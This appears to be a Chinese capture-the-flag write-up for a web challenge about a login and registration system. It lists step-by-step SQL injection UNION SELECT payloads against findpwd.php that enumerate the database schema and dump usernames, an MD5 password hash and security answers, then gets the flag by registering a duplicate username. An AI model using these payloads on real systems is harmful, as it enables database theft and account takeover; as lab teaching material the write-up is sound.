题目分析
题目描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。
尝试发现该靶机环境的主要功能为登陆、注册、找回密码,题目描述也是很直接,漏洞点就在这。
遇事不决先扫描一下网站有没有漏洞
发现在findpwd.php中存在sql注入漏洞
尝试联合查询
-1' union select 1,2,3,4--
-1' union select 1,2,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata),4--
得到数据库cetc004
-1' union select 1,2,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA="cetc004" ),4--
得到表名:user
-1' union select 1,2,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'user'),4--
得到字段:username,password,question,answer
-1' union select 1,2,(SELECT GROUP_CONCAT(username) FROM cetc004.user),4--
得到username为:c3tlwDmIn23
password:2f8667f381ff50ced6a3edc259260ba9
question:cetc
answer:cdwcewf2e3235y7687jnhbvdfcqsx12324r45y687o98kynbgfvds
可以发现password被MD5加密了(因为我尝试注册了一个账号,发现数据库中存放的密码就是md5后的结果)
于是尝试在找回密码界面修改c3tlwDmIn23的密码,发现需要输入原密码。明显findpwd.php也不是我们能攻击的点。
用自己注册的账号进行修改密码发现会跳转到reset.php
抓包后也没有发现什么可攻击的点。最后神奇的我试了一下注册相同的用户名。。。。。居然没有查重直接注册了一个用户名为c3tlwDmIn23的账号。。。登陆获得flag